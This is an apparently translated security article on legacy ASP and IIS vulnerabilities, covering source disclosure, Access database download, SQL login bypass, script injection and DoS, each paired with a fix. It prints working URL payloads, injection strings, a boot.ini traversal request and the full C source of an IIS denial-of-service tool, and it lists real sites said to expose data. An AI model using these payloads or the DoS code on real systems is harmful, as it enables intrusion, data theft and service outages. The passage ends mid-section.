ASP Vulnerability Analysis and Solution

Source: Internet
Author: User
Tags: dsn, mdb, database, odbc connection, microsoft access database, microsoft iis, ntfs permissions

1. Appending a special symbol to an ASP file name reveals the ASP source program
Affected versions:
Windows 95 + PWS
IIS 3.0
Windows 98 + PWS 4 does not have this vulnerability.
IIS 4.0 and later versions are not affected.
Problem description:
The special symbols include a trailing dot, %81 and ::$DATA. For example:
http://someurl/somepage.asp.
http://someurl/somepage.asp%81
http://someurl/somepage.asp::$DATA
http://someurl/somepage.asp%2e
http://someurl/somepage%2e%41sp
http://someurl/somepage%2e%ASP
http://someurl/somepage.asp%2e
http://someurl/MSADC/samples/selector/showcode.asp?source=/MSADC/samples/.../../boot.ini (shows the content of the boot.ini file)
On IIS 3.0, and on Windows 95 with PWS installed, the source of somepage.asp can be read directly in the browser this way. What causes this serious vulnerability?
The root cause lies in the file system exclusive to Windows NT. Anyone with a little background knows that NT provides a file system completely different from FAT: NTFS, the New Technology File System, which gives NT a strong security mechanism but has also caused a number of headaches.
What is less well known is that NTFS allows a file to contain multiple data streams. The main stream that holds the file's content is called "$DATA", so by naming that stream directly in the browser the script source can be pulled straight out of the file. The reason ::$DATA works, however, is that IIS fails to parse the file name correctly and does not normalize it before deciding how to handle the request.
Solution and suggestions:
If you are a Windows NT user, install IIS 4.0 or IIS 5.0. Windows 2000 does not have this problem. Windows 95 users should install Windows 98 and PWS 4.0.

2. Access .mdb database download vulnerability
Problem description:
When Access is used as the back-end database, anyone who learns or guesses the path and name of the server's Access database can download the file, which is very dangerous. For example, if your Access database book.mdb is stored in the database directory under the virtual directory, someone can enter in the browser:
http://someurl/database/book.mdb
If book.mdb has not been encrypted in advance, all the important data in book.mdb is now in that person's hands.
Solution:
(1) Give the database file a complex, unconventional name and put it several directory levels deep. For example, if a database stores information about books, do not name it book.mdb; name it something like d34ksfslf.mdb and put it in a directory such as /kdslf/i44/studi/. It is then difficult for an attacker to obtain your Access database file by guessing.
(2) Do not write the database name into the program. Some people like to build the DSN in the program, such as:
dbpath = Server.MapPath("analyticdb.mdb")
conn.Open "driver={Microsoft Access Driver (*.mdb)};DBQ=" & dbpath
If someone obtains the source program, your Access database name is visible at a glance. We therefore recommend that you define the data source in ODBC and write the connection in the program as:
conn.Open "shujiyuan"
(3) Use Access to encode and password-protect the database file. First choose Tools > Security > Encrypt/Decrypt Database, select the database (for example employer.mdb) and click OK. A window "Save the encrypted database as" appears; enter employer1.mdb. employer.mdb is then encoded and stored as employer1.mdb.
Note that this step does not set a password on the database; it encodes the database file so that others cannot read its contents with other tools.
Next, set the database password. Open the encoded employer1.mdb in "Exclusive" mode, choose Tools > Security > Set Database Password from the menu, and enter the password.
Once employer1.mdb has a password, Access asks for the password whenever the database file is opened, and the database can be opened only after the password is verified.
In the ASP program, you only need to add the PWD parameter to the connection object's Open method. For example:
param = "driver={Microsoft Access Driver (*.mdb)};Pwd=yfdsfs"
param = param & ";DBQ=" & Server.MapPath("employer1.mdb")
conn.Open param
In this way, even if someone else obtains the file employer1.mdb, he cannot read its contents without the password.

3. code.asp files may leak ASP code
Problem description:
The ASP 1.0 samples provided by Microsoft include an ASP file used to view the source of other ASP files: aspsamp/samples/code.asp. If this program is uploaded to the server and the server takes no precautions, anyone can view other programs with it. For example:
code.asp?source=/directory/file.asp
This is an old vulnerability, however, and it should rarely occur today.
The following request is relatively new: http://someurl/iissamples/ExAir/howitworks/code.asp?/lunwen/soushuo.asp=xxx.asp
The greatest harm is that .asa files can be read in this way, exposing the database password to attackers in plaintext.
Solution or suggestion:
Delete the sample "show ASP code" programs that ship with IIS, or disable access to their directory.

4. FileSystemObject component allows tampering with and downloading any file on a FAT partition
Problem description:
In IIS 3 and IIS 4, ASP file operations are performed through FileSystemObject: reading and writing text files, directory operations, copying, renaming and deleting files, and so on. This powerful feature, however, leaves a very dangerous "backdoor". FileSystemObject can be used to tamper with any file on a FAT partition, and even NTFS partitions can be damaged if permissions are not set. A careless administrator can suffer a disaster. Unfortunately, many webmasters only know how to run the web server and seldom set NTFS permissions, and the default NT directory permissions are terrible. If you are a webmaster, we therefore recommend that you pay close attention to server settings and place the web directory on an NTFS partition. Do not give Everyone full control of the directory; even members of the Administrators group do not need full control, only Read and Change permissions. You can also delete or rename the FileSystemObject component.

5. Entering standard HTML or JavaScript statements changes the output
Problem description:
What happens when standard HTML statements are entered in an input box?
For example, in a guestbook, enter <font size=10>hello!</font>
If your ASP program does not filter HTML statements, the font size of "hello" is changed. Changing the font size and appearance in a guestbook is not always a bad thing and can make it livelier. However, an endless JavaScript loop can also be written in the input box, for example <a href="http://someurl" onmouseover="while(1){window.close('/')}">major news</a>
If a visitor moves the mouse over "major news", the browser hangs in the endless loop.
Solution and suggestions:
Take precautions against such input when writing similar programs. For example, write code that checks the client's input and blocks all HTML and JavaScript statements.
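As an added example that is not from the original article, here is how a classic ASP guestbook can apply this advice: the submitted text is length-checked, rejected if it contains tag or script syntax, and HTML-encoded with Server.HTMLEncode before it is written out, so the <font> and onmouseover strings above would be shown as literal text rather than interpreted. The form field names, the Application-level message store and the 500-character limit are assumptions.

```vbscript
<%
' Added example (not from the original article). Form field names, the
' Application-level message store and the length limit are assumptions.
Option Explicit

' Returns True when the text contains anything that looks like markup or
' script: angle brackets, a javascript: URL, or an on... event attribute.
Function LooksLikeMarkup(text)
    Dim re
    Set re = New RegExp
    re.IgnoreCase = True
    re.Global = False
    re.Pattern = "[<>]|javascript\s*:|\bon\w+\s*="
    LooksLikeMarkup = re.Test(text)
End Function

' Encoding when the HTML is built is the control that matters: even if a
' message containing markup slipped past the check, the browser receives
' &lt;font&gt; rather than <font>, so nothing is rendered or executed.
Function RenderMessage(name, text)
    RenderMessage = "<p><b>" & Server.HTMLEncode(name) & "</b>: " & _
                    Server.HTMLEncode(text) & "</p>"
End Function

Dim name, text
name = Trim(Request.Form("name"))
text = Trim(Request.Form("message"))

If Request.ServerVariables("REQUEST_METHOD") = "POST" Then
    If Len(name) = 0 Or Len(text) = 0 Or Len(text) > 500 Then
        Response.Write "<p>Please enter a name and a message of at most 500 characters.</p>"
    ElseIf LooksLikeMarkup(text) Or LooksLikeMarkup(name) Then
        Response.Write "<p>HTML and script are not allowed in messages.</p>"
    Else
        ' Constructed in-memory store so the example runs without a database.
        Application.Lock
        Application("guestbook") = Application("guestbook") & RenderMessage(name, text)
        Application.Unlock
    End If
End If

Response.Write Application("guestbook")
%>
```

The rejection pattern is a convenience for the user; the encoding in RenderMessage is what actually prevents the <font> and onmouseover examples from taking effect, because it is applied to every message regardless of how it was stored.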

6. ASP program password verification vulnerability
Vulnerability description:
Many websites keep passwords in a database and use the following SQL statement for login verification (ASP is used as the example):
sql = "select * from user where username='" & username & "' and pass='" & pass & "'"
All that is needed is to construct a special user name and password based on SQL, such as ben' or '1'='1, to enter pages for which you have no privileges. Look at the statement above again: when both the user name and the password boxes contain ben' or '1'='1, the program builds this:
sql = "select * from user where username='ben' or '1'='1' and pass='ben' or '1'='1'"
"or" is a logical operator: when two conditions are combined with it, the expression is true if either condition is true. In this statement the "and" check of the original query no longer has any effect, because '1'='1' is always true and the "or" makes the whole condition return true.
The following user names can also be constructed:
username = 'a' or username<>'a'
pass = 'a' or pass<>'a'
Type aa' or username<>'aa in the browser's user name box and aa' or pass<>'aa in the password box; note that neither string has a quote at its ends, since the program adds them. In this way the system can be cheated and entered.
Although the latter method is correct in theory, it is difficult in practice, because two conditions must be met:
1. You must know exactly which two fields of the table store the user name and the password, since only then can the attack string be constructed precisely. In practice this is hard to guess.
2. The system must not check the validity of the entered string.
Solution and suggestions:
Validate the submitted content before building the query, and handle numeric values appropriately.
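As an added example that is not part of the original article, the following classic ASP page places the vulnerable concatenated query from the text beside a version that passes the user name and password as ADODB.Command parameters, so the input ben' or '1'='1 is compared literally against the column instead of becoming part of the SQL. The DSN name "shopdb", the column widths and the use of Session("system_name") on success are assumptions; the table "user" with columns username and pass follows the article.

```vbscript
<%
' Added example, not from the original article. The DSN "shopdb", the column
' sizes and the session variable set on success are assumptions; the table
' "user" with columns username and pass follows the article.
Option Explicit
Dim username, pass
username = Request.Form("username")
pass = Request.Form("pass")

' Vulnerable form from the article: the values are spliced into the SQL text,
' so the input  ben' or '1'='1  in both boxes makes the WHERE clause always true.
' sql = "select * from user where username='" & username & "' and pass='" & pass & "'"

' Hardened form: the SQL text is fixed, the values travel as typed parameters.
Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

Function FindUser(conn, u, p)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "select username from [user] where username = ? and pass = ?"
    cmd.Parameters.Append cmd.CreateParameter("u", adVarChar, adParamInput, 50, u)
    cmd.Parameters.Append cmd.CreateParameter("p", adVarChar, adParamInput, 50, p)
    Set FindUser = cmd.Execute
End Function

Dim conn, rs
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "DSN=shopdb"
Set rs = FindUser(conn, username, pass)

If rs.EOF Then
    ' A user name of  ben' or '1'='1  now simply matches no row.
    Response.Write "<p>Login failed.</p>"
Else
    Session("system_name") = rs("username")
    Response.Write "<p>Welcome, " & Server.HTMLEncode(rs("username")) & "</p>"
End If
rs.Close
conn.Close
%>
```

With parameters the driver sends the SQL text and the two values separately, so quotes, "or" and "<>" in the input never reach the query parser; the validation the article recommends is still worth doing on top of this, but it is no longer the only thing standing between the input and the database.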

7. ASP source code disclosure when Index Server is installed with IIS 4 or IIS 5
Problem description:
On a server running Index Server with IIS 4 or IIS 5, a request in a special format returns the source of ASP pages and other scripts. The problem exists even on systems that have recently been patched against source disclosure or that contain no .htw file at all. Obtaining the source of ASP programs, and even of global.asa, is a major security risk: these files usually contain user names and passwords as well as the path and name of the database, which is very valuable to an attacker collecting information for the next step of an intrusion.
The source can be viewed by constructing the following request:
http://202.116.26.38/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=full
This returns only some HTML, but when %20 is appended to the CiWebHitsFile parameter:
http://someurl/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=full
the source code of the program is returned.
(Note: /default.asp is relative to the web root. For example, a website's http://welcome/welcome.asp corresponds to:
http://someurl/null.htw?CiWebHitsFile=/welcome.asp%20&CiRestriction=none&CiHiliteType=full
)
Because null.htw is not a real mapped file on disk but a virtual file held in memory, requests for null.htw are still handled by webhits.dll by default even if every real .htw file has been deleted from the system, so IIS remains exposed.
Solution or suggestion:
If the system needs the functions provided by webhits, download the corresponding patch. If not, use the IIS MMC management tool to remove the .htw application mapping.
The patches are as follows:
Index Server 2.0:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726

8. Accessing an ASP page without authentication
Vulnerability description:
If a user knows the path and file name of an ASP page that is supposed to require verification, entering that file name directly may bypass the verification. For example, I tried this on some websites: close all browsers, then enter http://someurl/system_search.asp?page=1
The page that only system staff should see is displayed. Of course, some people add a check at the beginning of system_search.asp to prevent this, for example:
Check Session("system_name"); if it is not empty, the user may enter. The URL request above can then no longer reach the administrator page directly. However, this method also has a weakness. If an attacker first logs in with a valid account, or generates a session on the local machine with, for example, Session("system_name") = "admi", then because Session("system_name") is not empty the administrator page can be reached without a password.
Solution:
Perform the corresponding processing at the beginning of every ASP page that requires verification. For example, track the file name of the previous page, so that only sessions that arrived from the previous page can read this page.

9. Remote DoS attack on IIS 4.0/5.0 through URL requests in a special data format
Vulnerability description:
When a URL with a special data format is requested from a web service running IIS 4.0 or IIS 5.0, the attacked web server may temporarily respond slowly.
Affected versions:
Microsoft Internet Information Server 4.0
Microsoft Internet Information Server 5.0
The vulnerability test program is at:
http://202.96.168.51/download/exploits/iisdos.exe
Its source code is at:
http://202.96.168.51/download/exploits/iisdos.zip
Test procedure:
Enter iisdos <***.***> to attack the other party's web server.
Solution:
Internet Information Server 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906
Internet Information Server 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904
More information:
http://www.microsoft.com/technet/security/bulletin/ms00-030.asp
Microsoft Security Bulletin MS00-021:
http://www.microsoft.com/technet/security/bulletin/fq00-030.asp
Related links:
http://www.ussrback.com

10. IIS web server DoS
Vulnerability description:
By default IIS is vulnerable to a DoS attack: if the registry value "MaxClientRequestBuffer" has not been created, the attack against such NT systems usually succeeds.
"MaxClientRequestBuffer" sets the amount of request input IIS accepts. If it is set to 256 (bytes), an attacker can only send IIS a request of up to 256 bytes. The system default imposes no limit, so the following program can easily mount a DoS attack on an IIS server:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define MAX_THREAD 666

void cng(void);

char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;

int main(int argc, char **argv)
{
    WORD tequila;
    WSADATA data;
    int p;
    DWORD tid;
    HANDLE hThread[2000];

    /* This code is as is and sucks as it is. Won't exit correctly and a lot
       of other fun things that I didn't want to take the time to do.
       So just Ctrl+C out of it. Load up cnghack.exe 3 times for charm. */
    printf("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eEye.com\n\"For my beloved.\"\n");
    if (argc < 2) {
        printf("Usage: %s [server] [port]\n", argv[0]);
        exit(1);
    }
    /* Request body: a buffer of 'A's (the original sizes the memset with
       strlen on the freshly allocated buffer). */
    buffer = malloc(17500);
    memset(buffer, 'A', strlen(buffer));
    server = argv[1];
    port = atoi(argv[2]);
    tequila = MAKEWORD(1, 1);
    printf("Attempting to start Winsock...");
    if ((WSAStartup(tequila, &data)) != 0) {
        printf("failed to start Winsock.\n");
        exit(1);
    } else {
        printf("started Winsock.\n");
    }
    counter = 0;
    /* Spawn MAX_THREAD worker threads, each holding one connection open. */
    for (p = 0; p < MAX_THREAD; ++p) {
        hThread[counter] = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)cng,
                                        (void *)++counter, 0, &tid);
    }
    Sleep(250);
    while (current_threads)
        Sleep(250);
    counter = 0;
    printf("Terminated threads.\n");
    while (counter < MAX_THREAD) {
        TerminateThread(hThread[counter], 0);
        ++counter;
    }
    WSACleanup();
    return 0;
}

void cng(void)
{
    int sockfd = 0, p;
    struct sockaddr_in dstsain;
    char getkilled[] = "GET / HTTP/\r\n";
    int die = 1;

    printf("entered cng\n");
    ++current_threads;
    dstsain.sin_family = AF_INET;
    dstsain.sin_port = htons((u_short)port);
    dstsain.sin_addr.s_addr = inet_addr(server);
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("failed to create socket\n");
        --current_threads;
        return;
    }
    if (!connect(sockfd, (struct sockaddr *)&dstsain, sizeof(dstsain))) {
        /* Send an incomplete request line, then keep the request going with
           a never-ending stream of 'A's so the server never sees its end. */
        p = send(sockfd, getkilled, strlen(getkilled), 0);
        printf("Step 1: %i\n", p);
        for (;;) {
            p = send(sockfd, buffer, strlen(buffer), 0);
            printf("p: %i\n", p);
            /* Put in some code to check if send == -1 more than X times,
               then drop the loop and exit the thread.
               Bla, I love the dirtiness of concept code. */
        }
    }
    --current_threads;
    printf("exited cng\n");
    return;
}

cnghack.c works as follows:
Connects to example.com
Sends: GET / HTTP/[return][buffer]

Where:
[return] is just a \r\n
[buffer] is a never-ending stream of A's

The attack drives the CPU usage of the NT system to 100%.
Solution:
Run regedt32.exe and open HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters.
Add a value:
Value Name: MaxClientRequestBuffer
Data Type: REG_DWORD
Base: Decimal
This value sets the maximum request length IIS accepts.
Set the value to 256.

11. DoS attack on NT/9x caused by a connection overflow in the MS ODBC database driver
Vulnerability description:
The Microsoft ODBC database driver may have an overflow problem when a connection (to a Microsoft Access database) is opened or closed. If a second database connection is opened directly without closing the first, the service may stop.
Affected system:
ODBC version: 3.510.3711.0
ODBC Access driver version: 3.51.1029.00
OS version: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (mso97.dll: 8.0.0.3507)
The vulnerability is detected as follows:
ODBC data source name: miscdb
ODBC database type: MS Access
Assumed database path: D:\data\Misc.mdb
The ASP code is as follows:
<%
Set connVB = Server.CreateObject("ADODB.Connection")
connVB.Open "driver={Microsoft Access Driver (*.mdb)};DSN=miscdb"
%>
<html>
<body>
... lots of HTML removed ...
<!-- We connect to db1 -->
<%
Set connGlobal = Server.CreateObject("ADODB.Connection")
connGlobal.Open "DSN=miscdb;user=sa"
mSQL = "arb SQL statement"
Set rsGlobal = connGlobal.Execute(mSQL)
While Not rsGlobal.EOF
    Response.Write rsGlobal("resultfrommiscdb")
    rsGlobal.MoveNext
Wend
'rsGlobal.Close
'Set rsGlobal = Nothing
'connGlobal.Close
'Set connGlobal = Nothing
'Note: we do not close the connection
%>
<!-- Call the same database by means of DBQ direct file access -->
<%
Set connGlobal = Server.CreateObject("ADODB.Connection")
connGlobal.Open "driver={Microsoft Access Driver (*.mdb)};DBQ=D:\data\Misc.mdb"
mSQL = "arb SQL statement"
Set rsGlobal = connGlobal.Execute(mSQL)
While Not rsGlobal.EOF
    Response.Write rsGlobal("resultfrommiscdb")
    rsGlobal.MoveNext
Wend
rsGlobal.Close
Set rsGlobal = Nothing
connGlobal.Close
Set connGlobal = Nothing
'Note: we do close the connection
%>
In this situation the IIS process hangs and the CPU usage of the inetinfo.exe process reaches 100%. The computer can be recovered only by restarting it.

12. ASP homepage .inc file leakage
Vulnerability description:
Affected versions: any system that provides ASP services
Remote: yes / Local: yes
Summary:
When an ASP homepage is still being created and final debugging is not complete, some search engines index it anyway. Anyone who searches for these pages with the search engine can locate the file and view the detailed location and structure of the database in the browser, revealing the complete source code.
The procedure is as follows:
- Use the search engine to search for pages containing the keywords "Microsoft VBScript run-time error" and ".inc".
- The search engine finds and displays the ASP include files (.inc) to the user.
- View the file's source code in a browser; it may contain sensitive information.
Vulnerability exploitation:
Examples:
http://shopping.altavista.com/inc/lib/prep.lib
Exposes database connection and type, resource locations, cookie logic, server IP address
http://www.justshop.com/SFLib/ship.inc
Exposes database type
http://www.bbclub.com:8013/sort des/General.inc
Exposes co-branding
http://www.salest.com/corporate/admin/include/jobs.inc
Exposes data file location and structure
http://www.bjsbabes.com/SFLib/design.inc
Exposes database structure and StoreFront 2000 source code
http://www.ffg.com/scripts/IsSearchEngine.inc
Exposes search engine record files
http://www.wcastl.com/include/functions.inc
Exposes member e-mail addresses
http://www.wcastl.com/flat/comments.txt
Exposes the members' private comment file
http://www.traveler.net/two/cookies.inc
Exposes cookie logic
Solution:
- Search engines should not index pages with ASP runtime errors.
- Programmers should thoroughly debug a page before publishing it.
- Security staff need to fix ASP files so that external users cannot view them.
ASP newsgroups and sites offer two ways to fix this vulnerability: encrypt the contents of the .inc file, or use an .asp file instead of an .inc file so that users cannot view the file's source directly in the browser. In addition, .inc files should not be given default names or names with an obvious meaning that users can easily guess; use random letters instead.
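The following added example (not code from the original article) combines the advice of section 8 with the fix described here: the login check lives in an include file named checklogin.asp rather than checklogin.inc and consists only of a script block, so a direct request for it is executed by ASP and returns an empty page instead of the source. The check also refuses a session whose system_name was not set by login.asp itself, which is one server-side way to implement the "only sessions that arrived from the previous page" idea. The file names, the session variable auth_source and the assumption that login.asp sets both values only after a successful credential check are mine, not the article's.

```vbscript
<%
' ---- checklogin.asp (include file, deliberately not checklogin.inc) ----
' Added example, not from the original article. Everything is inside a script
' block, so requesting /checklogin.asp directly yields an empty page rather
' than this source. Assumes login.asp sets both session values only after the
' credentials have been verified (assumption):
'     Session("system_name") = rs("username")
'     Session("auth_source") = "login.asp"
Sub RequireStaffLogin()
    Dim who, src
    who = Session("system_name")
    src = Session("auth_source")
    ' Reject an empty name, and reject a name that was not recorded by
    ' login.asp: a session variable set by any other page does not count
    ' as a login, so a planted system_name alone is not enough.
    If IsEmpty(who) Or who = "" Or src <> "login.asp" Then
        Session.Abandon
        Response.Redirect "login.asp?returnto=" & _
            Server.URLEncode(Request.ServerVariables("SCRIPT_NAME"))
    End If
End Sub
%>

<!-- ---- system_search.asp (the staff-only page from section 8) ---- -->
<!--#include file="checklogin.asp"-->
<%
Response.Buffer = True   ' lets the redirect happen before any output is sent
Call RequireStaffLogin()
Response.Write "<p>Search page for " & Server.HTMLEncode(Session("system_name")) & "</p>"
%>
```

The include is the first thing on every protected page and runs before any HTML is emitted, so a visitor who types the page's URL directly, as in section 8, is redirected to login.asp, and the connection details that a .inc file would have exposed never leave the server.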

13. Active Server Explorer can be used to read and write files
Vulnerability description:
ChinaASP's Active Server Explorer makes it easy to view local files online, modify files and directory names on the server (.txt, .htm, .asp, .pl, .cgi and so on) and execute files on the server directly.
Active Server Explorer needs a relative or absolute path. If an attacker uploads Active Server Explorer to a directory on the target server that supports ASP, he can modify and execute files on the target server through it. This can happen whenever the attacker has an account with a writable directory on the target NT server and that directory supports ASP: for example, on free personal homepage servers that support ASP, upload Active Server Explorer to the homepage space you applied for, then obtain the target server's path by various means (for example the vulnerability "if a request does not contain an .idq or .ida file extension, the physical path of the file on the server is exposed"), or simply enter ".", usually the default. In this way the attacker can modify files on the target server, regardless of whether the file has read/write access.
Servers that offer personal homepages or other ASP-enabled services therefore need to be especially careful about such attacks.
Vulnerability solution:
In fact, Active Server Explorer exploits vulnerability 4 above, the FileSystemObject component that allows tampering with and downloading any file on a FAT partition.
So how can we restrict users from using the FileSystemObject object? An extreme approach is to completely unregister the component that provides the FileSystemObject object, scrrun.dll. The specific method is as follows:
At a command prompt, type:
regsvr32 /u c:\windows\system\scrrun.dll
(Note: change the path to the actual path on your machine)
After this the FileSystemObject object cannot be used at all. But the FileSystemObject object is sometimes very convenient for managing files, so what can be done?
Is there a way to get the best of both worlds?
We can prevent others from using the FileSystemObject object illegally while still using it ourselves.
The method is as follows:
Search the registry for the key
HKEY_CLASSES_ROOT\Scripting.FileSystemObject
and rename it to a string of your choice (right-click > Rename), for example to
HKEY_CLASSES_ROOT\Scripting.FileSystemObject2
From then on the object must be referenced in ASP as:
Set fso = CreateObject("Scripting.FileSystemObject2")
and can no longer be created with:
Set fso = CreateObject("Scripting.FileSystemObject")
Anyone who calls the FileSystemObject object in the usual way can no longer use it.
As long as you do not tell others the modified object name, they cannot use the FileSystemObject object. As site managers we can thus prevent others from using the FileSystemObject object illegally while still using it ourselves for convenient online website management and other functions!

14. IIS 4.0/5.0 over-long file name request vulnerability
Vulnerability description:
Affected versions:
Microsoft IIS 5.0
  + Microsoft Windows 2000
Microsoft IIS 4.0
  + Microsoft Windows NT 4.0
  + Microsoft BackOffice 4.5
    - Microsoft Windows NT 4.0
  + Microsoft BackOffice 4.0
    - Microsoft Windows NT 4.0
If 230 "%20" sequences followed by .htr are appended to a known file name, Microsoft IIS 4.0/5.0 leaks the file's contents. The cause is the .htr extension mapping handled by ISM.DLL. For example:
http://target/filename%20<repeated 230 times>.htr
The request only works when it is the first .htr request, that is, when ISM.DLL is being loaded into memory for the first time.
Solution:
Install patches:
Microsoft IIS 5.0: